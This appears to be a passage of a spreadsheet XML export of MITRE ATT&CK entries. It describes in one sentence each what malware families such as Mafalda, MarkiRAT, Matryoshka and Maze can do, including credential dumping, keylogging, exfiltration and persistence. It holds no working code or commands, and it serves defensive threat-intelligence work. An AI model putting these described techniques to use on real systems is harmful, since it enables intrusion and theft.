    <t>[Machete](https://attack.mitre.org/software/S0409) has used AES to exfiltrate documents.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>relationship--140046d6-8cb6-4a09-bd74-fd7696ac4247</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) collects the hostname of the target computer.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>relationship--d843c014-0814-4945-b75a-09db4ad6e81b</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) collects the MAC address of the target computer and other network configuration information.(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--6a9d747a-d2d6-48eb-92d0-441f1c127c4c</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</si>
  <si>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</si>
  <si>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relationship--3d787947-fdaf-4fcd-938d-19b4672abfac</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) takes photos from the computer’s web camera.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--293f103b-ab5f-46ee-b51e-c111370f3b79</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) uses HTTP for Command &amp; Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>relationship--87b4eb41-5272-4aa5-ae2f-3541a754d011</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can use `AdjustTokenPrivileges()` to elevate privileges.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--c353c2cd-cc78-4d7c-a3b0-5aa1d927368b</t>
  </si>
  <si>
    <t>04 April 2023</t>
  </si>
  <si>
    <t xml:space="preserve">[Mafalda](https://attack.mitre.org/software/S1060) can collect the contents of the `%USERPROFILE%\AppData\Local\Google\Chrome\User Data\LocalState` file.(Citation: SentinelLabs Metador Sept 2022) </t>
  </si>
  <si>
    <t>relationship--87590696-bf1c-4d42-8ef7-851fb10d8053</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can delete Windows Event logs by invoking the `OpenEventLogW` and `ClearEventLogW` functions.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--3246b73c-ac8e-44ab-adf8-189c0086ae12</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can collect files and information from a compromised host.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--48316ab6-0019-47ad-b751-3b7efce756f2</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can search for debugging tools on a compromised host.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--cce43f73-d564-4c60-9492-52b3f7039b7b</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can decrypt files and data.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--4975b6f9-c542-4ad9-bfeb-6182c4db895f</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can send network system data and files to its C2 server.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--8fbcd4e8-d2b5-408c-8b3a-1e990833705b</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can establish an SSH connection from a compromised host to a server.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--2b7c7d72-1858-4e36-a96b-6377272daf70</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can search for files and directories.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--cb11835b-c16e-4877-8769-806277b994fc</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can download additional files onto the compromised host.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--995aaffc-947a-4674-825f-9b6d53b7aefc</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can conduct mouse event logging.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--6eb97f82-c49f-465d-b788-15a789f928b5</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can create a named pipe to listen for and send data to a named pipe-based C2 server.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--54b14853-fe7e-484e-ac14-849da168706c</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can dump password hashes from `LSASS.exe`.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--e40421c6-cf5e-4e99-8259-07dcc1234365</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can place retrieved files into a destination directory.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--421fd048-a5c3-46b0-b1ff-a7510c107879</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can create a token for a different user.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--1703b260-35ef-466a-bec7-d17d6c6cf987</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can manipulate the system registry on a compromised host.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--35317fb7-9426-4f6e-9c78-64bb7a2da67f</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can use a variety of API calls.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--cb0632ef-fb36-44c1-916c-4de7ce1c956e</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can use raw TCP for C2.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--3f424011-cde1-4ed5-b067-3cb4d6193d72</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) has been obfuscated and contains encrypted functions.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--cfc3d427-79bb-41d1-8336-aa1365555d0f</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</si>
  <si>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</si>
  <si>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relationship--16a59f96-4c5c-4625-a776-61162ac9c6c1</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can execute PowerShell commands on a compromised machine.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--4c13f346-bdd9-4759-b1a8-1f3a38c6055b</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can collect a Chrome encryption key used to protect browser cookies.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--373f2bc5-e221-459e-9922-27bead9a53fe</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can enumerate running processes on a machine.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--69b6cf6f-f018-4999-b640-fc5a3cb2aa2d</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can enumerate Registry keys with all subkeys and values.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--7ad999fd-9d57-40d3-b942-d8749a6f46cc</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can take a screenshot of the target machine and save it to a file.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--89574823-b59e-4a8e-87b1-8bbb9531b603</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can search for a variety of security software programs, EDR systems, and malware analysis tools.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--cd7cda5b-ad63-433e-a47d-abbd6dca5f41</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can create a remote service, let it run once, and then delete it.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--395cee0e-ee8b-4e90-b2a7-f3a271ef0b1a</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can encode data using Base64 prior to exfiltration.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--2efd43af-7571-4fd6-81cd-c26d7f769133</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can encrypt its C2 traffic with RC4.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--8fd3fb7d-29be-4199-87e4-6fb270925ab1</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can collect the computer name and enumerate all drives on a compromised host.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--91cea20a-9698-4bec-8fdd-c1eda3ea66e7</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can use the `GetAdaptersInfo` function to retrieve information about network adapters and the `GetIpNetTable` function to retrieve the IPv4 to physical network address mapping table.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--9c057a7e-c815-4d43-a250-6696dc3691e2</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can use the &lt;code&gt;GetExtendedTcpTable&lt;/code&gt; function to retrieve information about established TCP connections.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--79c992f3-9df2-4ea0-a63f-690409f5faca</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can collect the username from a compromised host.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--a3849766-140d-4dc0-86ca-1e3ad38c15b5</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can use HTTP for C2.(Citation: SentinelLabs Metador Sept 2022)</t>
  </si>
  <si>
    <t>relationship--780cdc6b-9f3e-4b10-9110-b64e0e02922c</t>
  </si>
  <si>
    <t>[Mafalda](https://attack.mitre.org/software/S1060) can execute shell commands using `cmd.exe`.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)</t>
  </si>
  <si>
    <t>relationship--31bec3b7-5bb1-4a10-ab7c-4e82d67a0643</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used to obtain account names from Exchange and Office 365 using the &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; cmdlet.(Citation: Black Hills Attacking Exchange MailSniper, 2016)</t>
  </si>
  <si>
    <t>relationship--d2437ab0-888b-4490-a825-f70a490b7192</t>
  </si>
  <si>
    <t>06 October 2019</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used for password spraying against Exchange and Office 365.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>relationship--b85cff83-6468-4c63-9b25-4ac75fcb0e10</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used for searching through email in Exchange and Office 365 environments.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>relationship--03a65a95-b802-49ee-bec1-a65cccec0e89</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can use BITS Utility to connect with the C2 server.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--0ff081b9-5dde-4b48-a90f-3baf26b32a16</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can capture clipboard content.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--e94dc1ba-678b-4c09-9c29-515a5d277ec4</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can upload data from the victim's machine to the C2 server.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--41160796-9596-4a58-92a1-14dd3c9f4271</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can exfiltrate locally stored data via its C2.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--87039f89-ab04-4851-be9b-403a599a8c8e</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--27c7f9ed-dd66-4bc0-a186-2f05aac6d6df</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can download additional files and tools from its C2 server, including through the use of [BITSAdmin](https://attack.mitre.org/software/S0190).(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--2f4684b2-728f-46c5-9c91-98731c935b28</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can capture all keystrokes on a compromised host.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--42407045-4fd2-42b0-9686-ba6bbeafcaea</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can store collected data locally in a created .nfo file.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--c7d7c454-71fb-4a8e-989a-cb2e7404c0d3</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can masquerade as &lt;code&gt;update.exe&lt;/code&gt; and &lt;code&gt;svehost.exe&lt;/code&gt;; it has also mimicked legitimate Telegram and Chrome files.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--a8b39fac-bfe0-49c0-957f-8b8ebe2088c1</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can run the ShellExecuteW API via the Windows Command Shell.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--2d353aa1-9975-43cf-9aa3-3ef02fd3e61a</t>
  </si>
  <si>
    <t xml:space="preserve">[MarkiRAT](https://attack.mitre.org/software/S0652) can gather information from the Keepass password manager.(Citation: Kaspersky Ferocious Kitten Jun 2021) </t>
  </si>
  <si>
    <t>relationship--95e80511-d9ec-4001-8f49-37bc4ed71379</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can search for different processes on a system.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--af766021-c066-416c-80ba-9687f5641457</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can drop its payload into the Startup directory to ensure it automatically runs when the compromised system is started.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--45f150d4-a917-4862-bcee-170be75415cd</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can capture screenshots that are initially saved as ‘scr.jpg’.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--fdde7cd5-dd87-4280-b2df-6bd01fae8ea6</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can check for running processes on the victim’s machine to look for Kaspersky and Bitdefender antivirus products.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--6afb86e4-cb3b-40f5-ab03-10db5e0e9302</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can modify the shortcut that launches Telegram by replacing its path with the malicious payload to launch with the legitimate executable.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--410bd9e9-8ca7-4c3d-b517-e4d5b516333f</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can check for the Telegram installation directory by enumerating the files on disk.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--d1a2cd6c-1c7b-4c1a-9416-106e7951642c</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can obtain the computer name from a compromised host.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--7ac890f4-b4d0-4899-be19-bcbda48c3736</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can use the &lt;code&gt;GetKeyboardLayout&lt;/code&gt; API to check if a compromised host's keyboard is set to Persian.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--149fbbae-8c2e-4391-bb93-47375d4a68be</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can retrieve the victim’s username.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--17c50546-6ffb-462e-b4ec-2d7cd0b00f55</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can initiate communication over HTTP/HTTPS for its C2 server.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--cb15eab8-59ca-4b36-b1cc-574ff9a646f4</t>
  </si>
  <si>
    <t>[MarkiRAT](https://attack.mitre.org/software/S0652) can utilize cmd.exe to execute commands in a victim's environment.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--4e8af8d8-f650-45b0-9113-2137deb8e6d5</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of providing Meterpreter shell access.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--3ba2b8bc-1c5b-4cb3-8234-a7dc7b7552d0</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of stealing Outlook passwords.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>relationship--47a95ac1-e37a-40ea-bf1e-e99ff4483998</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses DNS for C2.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>relationship--c476a0da-44fd-4492-86ae-407aabab3735</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses reflective DLL injection to inject the malicious library and execute the RAT.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>relationship--47415cec-25f8-4425-9125-157e1637a687</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of keylogging.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>relationship--1f99a883-e78f-423d-9837-2b5ebb14fe63</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) obfuscates API function names using a substitute cipher combined with Base64 encoding.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>relationship--573916d8-804d-4453-be37-e6b1865e87db</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) can establish persistence by adding Registry Run keys.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>relationship--4696a49d-caa1-4746-b106-45faf327270b</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>relationship--cd70a632-a961-4adb-aea9-9995ef8e2b54</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) can establish persistence by adding a Scheduled Task named "Microsoft Boost Kernel Optimization".(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>relationship--d2560c35-b2f6-47d2-b573-236ef99894d5</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of performing screen captures.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>relationship--a56aafe6-4a54-4ce5-b927-8b56826b3445</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>relationship--0bbdc984-1515-4a8e-a211-2817371fc75e</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</si>
  <si>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</si>
  <si>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relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8</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</si>
  <si>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</si>
  <si>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relationship--dc9d4208-5e09-437e-bdd1-0dbfc4b54355</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has forged POST strings with a random choice from a list of possibilities including "forum", "php", "view", etc. while making connection with the C2, hindering detection efforts.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>relationship--6a521aa4-d389-4ef4-bd24-442d8af23333</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has injected the malware DLL into a target process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)	</t>
  </si>
  <si>
    <t>relationship--44fab50d-4fb6-4a8a-ab7a-84dcb70443f5</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</si>
  <si>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</si>
  <si>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relationship--cabbe975-9936-4a9a-8fae-a747b3dc7a9d</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>relationship--ea32ebd2-9827-43ec-a3d3-f0148fee8ed8</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</si>
  <si>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</si>
  <si>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relationship--20cedb41-1f7b-44df-8d49-5d6fc166c557</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using &lt;code&gt;msiexec&lt;/code&gt;.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>relationship--e3fa0df1-d388-4e74-b561-acc5094a8e1b</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.(Citation: McAfee Maze March 2020)	</t>
  </si>
  <si>
    <t>relationship--6e4d32b9-923f-46a9-887e-4d4d0687fd1b</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</si>
  <si>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</si>
  <si>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relationship--e3864ffa-3348-4791-b979-7d8b2e2151cc</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has gathered all of the running system processes.(Citation: McAfee Maze March 2020)	</t>
  </si>
  <si>
    <t>relationship--c54e60c1-728d-4211-b309-89f928ae7f0a</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has created a file named "startup_vrun.bat" in the Startup folder of a virtual machine to establish persistence.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>relationship--1075f27d-8675-4819-b23b-50d390092c95</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</si>
  <si>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</si>
  <si>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relationship--3cd19d07-822d-4efd-9f8c-e5b329f331a5</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</si>
  <si>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</si>
  <si>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relationship--a848dadb-f97f-4ded-a28e-a1c9954804a6</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has stopped SQL services to ensure it can encrypt any database.(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>relationship--dcd5b361-b86b-47c7-8ce8-85918e00a224</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has checked the language of the infected system using the "GetUSerDefaultUILanguage" function.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>relationship--0d3f773c-ed0e-4db4-8457-204a7a33eb58</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has checked the language of the machine with function &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt; and terminated execution if the language matches with an entry in the predefined list.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>relationship--21409e96-7a2f-4109-b23e-1b43005aaaa4</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has used the "WNetOpenEnumW", "WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>relationship--2f3d9b76-bec9-4cee-9a9b-1c42f373ec86</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>relationship--62c1a647-4a39-45b1-8d68-99b19ec12a78</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has communicated to hard-coded IP addresses via HTTP.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>relationship--9c89cfe5-1a9f-4b2d-82e2-f1638cb13b58</t>
  </si>
  <si>
    <t>The [Maze](https://attack.mitre.org/software/S0449) encryption process has used batch scripts with various commands.(Citation: FireEye Maze May 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>relationship--a747c7d5-afe9-4120-bb18-f21b5d9bb988</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</si>
  <si>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</si>
  <si>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relationship--b8ead9c4-0403-4b23-b33f-8ac1c57f8e82</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to send the compromised user's account name and hostname within a URL to C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>relationship--03341b9d-6848-4430-a868-b2bc61b357ba</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to upload and download files to and from a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>relationship--b96089fa-ebca-4d3c-9290-473cb98ad577</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>relationship--08057442-4b2c-4841-b351-8813431704e9</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) uses a python-based payload.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>relationship--9d4d3bb6-58b7-4c16-a405-d576e8e96c07</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use base16 encoded strings in C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>relationship--553dc864-7d6b-41f9-bb1c-9fc6ee3724b7</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to identify the username and hostname on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>relationship--3ef224b5-2edf-41c1-916f-1d80a7dc4ada</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use HTTP in communication with C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>relationship--5ba68c4c-2ac8-4046-bcac-8a7e81e1bdcf</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to run commands on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>relationship--80abde96-13dc-4551-9430-d8edddbba216</t>
  </si>
  <si>
    <t>S0576</t>
  </si>
  <si>
    <t>MegaCortex</t>
  </si>
  <si>
    <t>malware--909617c3-6d87-4330-8f32-bd3af38c3b92</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) can enable &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and adjust token privileges.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--fcfb5392-d5d3-451d-be1f-3cdb5ee264d8</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has changed user account passwords and logged users off the system.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--46250897-5a79-4401-b965-da8115a60d7f</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used code signing certificates issued to fake companies to bypass security controls.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>relationship--443ee76b-8fd4-4485-bdbb-4a562f348be0</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process.(Citation: IBM MegaCortex)(Citation: mbed-crypto)</t>
  </si>
  <si>
    <t>relationship--8b245546-d5ed-4ff8-b5a6-7c97250ce026</t>
  </si>
  <si>
